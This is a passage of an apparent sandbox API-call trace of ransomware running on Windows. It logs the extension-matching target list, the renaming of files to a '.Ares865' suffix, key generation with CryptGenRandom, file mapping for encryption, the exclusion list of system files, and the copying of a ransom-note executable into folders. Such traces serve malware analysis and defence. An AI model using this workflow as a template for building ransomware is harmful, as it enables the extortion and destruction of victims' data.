(lpString="adf") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0041.744] lstrlenW (lpString="adn") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0041.744] lstrlenW (lpString="adp") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0041.744] lstrlenW (lpString="alf") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0041.744] lstrlenW (lpString="ask") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0041.744] lstrlenW (lpString="btr") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0041.744] lstrlenW (lpString="cat") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0041.744] lstrlenW (lpString="cdb") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0041.744] lstrlenW (lpString="ckp") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0041.744] lstrlenW (lpString="cma") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0041.744] lstrlenW (lpString="cpd") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0041.744] lstrlenW (lpString="dacpac") returned 6 [0041.744] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0041.744] lstrlenW (lpString="dad") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0041.745] lstrlenW (lpString="dadiagrams") returned 10 [0041.745] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0041.745] lstrlenW (lpString="daschema") returned 8 [0041.745] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0041.745] lstrlenW (lpString="db-journal") returned 10 [0041.745] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0041.745] lstrlenW (lpString="db-shm") returned 6 [0041.745] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0041.745] lstrlenW (lpString="db-wal") returned 6 [0041.745] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0041.745] lstrlenW (lpString="dbc") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0041.745] lstrlenW (lpString="dbs") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0041.745] lstrlenW (lpString="dbt") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0041.745] lstrlenW (lpString="dbv") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0041.745] lstrlenW (lpString="dbx") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0041.745] lstrlenW (lpString="dcb") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0041.745] lstrlenW (lpString="dct") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0041.745] lstrlenW (lpString="dcx") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0041.745] lstrlenW (lpString="ddl") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0041.745] lstrlenW (lpString="dlis") returned 4 [0041.745] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0041.745] lstrlenW (lpString="dp1") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0041.745] lstrlenW (lpString="dqy") returned 3 [0041.745] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0041.746] lstrlenW (lpString="dsk") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0041.746] lstrlenW (lpString="dsn") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0041.746] lstrlenW (lpString="dtsx") returned 4 [0041.746] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0041.746] lstrlenW (lpString="dxl") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0041.746] lstrlenW (lpString="eco") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0041.746] lstrlenW (lpString="ecx") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0041.746] lstrlenW (lpString="edb") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0041.746] lstrlenW (lpString="epim") returned 4 [0041.746] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0041.746] lstrlenW (lpString="fcd") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0041.746] lstrlenW (lpString="fdb") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0041.746] lstrlenW (lpString="fic") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0041.746] lstrlenW (lpString="flexolibrary") returned 12 [0041.746] lstrlenW (lpString="fm5") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0041.746] lstrlenW (lpString="fmp") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0041.746] lstrlenW (lpString="fmp12") returned 5 [0041.746] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0041.746] lstrlenW (lpString="fmpsl") returned 5 [0041.746] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0041.746] lstrlenW (lpString="fol") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0041.746] lstrlenW (lpString="fp3") returned 3 [0041.746] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0041.746] lstrlenW (lpString="fp4") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0041.747] lstrlenW (lpString="fp5") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0041.747] lstrlenW (lpString="fp7") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0041.747] lstrlenW (lpString="fpt") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0041.747] lstrlenW (lpString="frm") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0041.747] lstrlenW (lpString="gdb") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0041.747] lstrlenW (lpString="gdb") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0041.747] lstrlenW (lpString="grdb") returned 4 [0041.747] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0041.747] lstrlenW (lpString="gwi") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0041.747] lstrlenW (lpString="hdb") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0041.747] lstrlenW (lpString="his") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0041.747] lstrlenW (lpString="ib") returned 2 [0041.747] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0041.747] lstrlenW (lpString="idb") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0041.747] lstrlenW (lpString="ihx") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0041.747] lstrlenW (lpString="itdb") returned 4 [0041.747] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0041.747] lstrlenW (lpString="itw") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0041.747] lstrlenW (lpString="jet") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0041.747] lstrlenW (lpString="jtx") returned 3 [0041.747] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0041.747] lstrlenW (lpString="kdb") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0041.748] lstrlenW (lpString="kexi") returned 4 [0041.748] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0041.748] lstrlenW (lpString="kexic") returned 5 [0041.748] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0041.748] lstrlenW (lpString="kexis") returned 5 [0041.748] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0041.748] lstrlenW (lpString="lgc") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0041.748] lstrlenW (lpString="lwx") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0041.748] lstrlenW (lpString="maf") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0041.748] lstrlenW (lpString="maq") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0041.748] lstrlenW (lpString="mar") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0041.748] lstrlenW (lpString="marshal") returned 7 [0041.748] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0041.748] lstrlenW (lpString="mas") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0041.748] lstrlenW (lpString="mav") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0041.748] lstrlenW (lpString="maw") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0041.748] lstrlenW (lpString="mdbhtml") returned 7 [0041.748] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0041.748] lstrlenW (lpString="mdn") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0041.748] lstrlenW (lpString="mdt") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0041.748] lstrlenW (lpString="mfd") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0041.748] lstrlenW (lpString="mpd") returned 3 [0041.748] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0041.748] lstrlenW (lpString="mrg") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0041.749] lstrlenW (lpString="mud") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0041.749] lstrlenW (lpString="mwb") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0041.749] lstrlenW (lpString="myd") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0041.749] lstrlenW (lpString="ndf") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0041.749] lstrlenW (lpString="nnt") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0041.749] lstrlenW (lpString="nrmlib") returned 6 [0041.749] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0041.749] lstrlenW (lpString="ns2") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0041.749] lstrlenW (lpString="ns3") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0041.749] lstrlenW (lpString="ns4") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0041.749] lstrlenW (lpString="nsf") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0041.749] lstrlenW (lpString="nv") returned 2 [0041.749] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0041.749] lstrlenW (lpString="nv2") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0041.749] lstrlenW (lpString="nwdb") returned 4 [0041.749] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0041.749] lstrlenW (lpString="nyf") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0041.749] lstrlenW (lpString="odb") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0041.749] lstrlenW (lpString="odb") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0041.749] lstrlenW (lpString="oqy") returned 3 [0041.749] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0041.749] lstrlenW (lpString="ora") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0041.750] lstrlenW (lpString="orx") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0041.750] lstrlenW (lpString="owc") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0041.750] lstrlenW (lpString="p96") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0041.750] lstrlenW (lpString="p97") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0041.750] lstrlenW (lpString="pan") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0041.750] lstrlenW (lpString="pdb") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0041.750] lstrlenW (lpString="pdm") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0041.750] lstrlenW (lpString="pnz") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0041.750] lstrlenW (lpString="qry") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0041.750] lstrlenW (lpString="qvd") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0041.750] lstrlenW (lpString="rbf") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0041.750] lstrlenW (lpString="rctd") returned 4 [0041.750] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0041.750] lstrlenW (lpString="rod") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0041.750] lstrlenW (lpString="rodx") returned 4 [0041.750] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0041.750] lstrlenW (lpString="rpd") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0041.750] lstrlenW (lpString="rsd") returned 3 [0041.750] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0041.750] lstrlenW (lpString="sas7bdat") returned 8 [0041.750] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0041.751] lstrlenW (lpString="sbf") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0041.751] lstrlenW (lpString="scx") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0041.751] lstrlenW (lpString="sdb") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0041.751] lstrlenW (lpString="sdc") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0041.751] lstrlenW (lpString="sdf") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0041.751] lstrlenW (lpString="sis") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0041.751] lstrlenW (lpString="spq") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0041.751] lstrlenW (lpString="te") returned 2 [0041.751] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0041.751] lstrlenW (lpString="teacher") returned 7 [0041.751] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0041.751] lstrlenW (lpString="tmd") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0041.751] lstrlenW (lpString="tps") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0041.751] lstrlenW (lpString="trc") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0041.751] lstrlenW (lpString="trc") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0041.751] lstrlenW (lpString="trm") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0041.751] lstrlenW (lpString="udb") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0041.751] lstrlenW (lpString="udl") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0041.751] lstrlenW (lpString="usr") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0041.751] lstrlenW (lpString="v12") returned 3 [0041.751] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0041.752] lstrlenW (lpString="vis") returned 3 [0041.752] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0041.752] lstrlenW (lpString="vpd") returned 3 [0041.752] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0041.752] lstrlenW (lpString="vvv") returned 3 [0041.752] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0041.752] lstrlenW (lpString="wdb") returned 3 [0041.752] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0041.752] lstrlenW (lpString="wmdb") returned 4 [0041.752] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0041.752] lstrlenW (lpString="wrk") returned 3 [0041.752] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0041.752] lstrlenW (lpString="xdb") returned 3 [0041.752] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0041.752] lstrlenW (lpString="xld") returned 3 [0041.752] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0041.752] lstrlenW (lpString="xmlff") returned 5 [0041.752] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0041.752] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\desktop.ini.Ares865") returned 47 [0041.752] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Recorded TV\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0041.756] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x160 [0041.756] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=80) returned 1 [0041.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0041.757] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0041.757] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0041.757] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0041.758] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0041.758] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0041.759] CreateFileMappingW (hFile=0x160, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x118 [0041.769] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0041.782] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0041.783] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0041.783] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0041.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb478 [0041.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb478 | out: hHeap=0x2b0000) returned 1 [0041.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cba28 [0041.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0041.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0041.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0041.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0041.784] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0041.784] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0041.784] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0041.784] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.791] CloseHandle (hObject=0x118) returned 1 [0041.791] CloseHandle (hObject=0x160) returned 1 [0041.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0041.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0041.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0041.792] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49627e40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.792] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.792] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49674100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49674100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0041.792] lstrcmpiW (lpString1="Sample Media", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="aoldtz.exe") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2=".") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="..") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="windows") returned -1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="bootmgr") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="temp") returned -1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="pagefile.sys") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="boot") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="ids.txt") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="ntuser.dat") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="perflogs") returned 1 [0041.793] lstrcmpiW (lpString1="Sample Media", lpString2="MSBuild") returned 1 [0041.793] lstrlenW (lpString="Sample Media") returned 12 [0041.793] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 39 [0041.793] lstrcpyW (in: lpString1=0x2cce438, lpString2="Sample Media" | out: lpString1="Sample Media") returned="Sample Media" [0041.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0041.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2d1ea0 [0041.793] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2428 | out: ListHead=0x2e7710, ListEntry=0x2d2428) returned 0x2e7c70 [0041.793] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49674100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49674100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0041.793] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0041.793] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2428 [0041.793] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0041.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0041.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0041.793] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media") returned 40 [0041.793] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0041.793] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.793] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\recorded tv\\sample media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0041.794] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0041.794] GetLastError () returned 0x20 [0041.794] Sleep (dwMilliseconds=0xc8) [0042.007] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0042.008] GetLastError () returned 0x0 [0042.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.008] ReadFile (in: hFile=0x154, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.008] CloseHandle (hObject=0x154) returned 1 [0042.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.008] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.008] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded 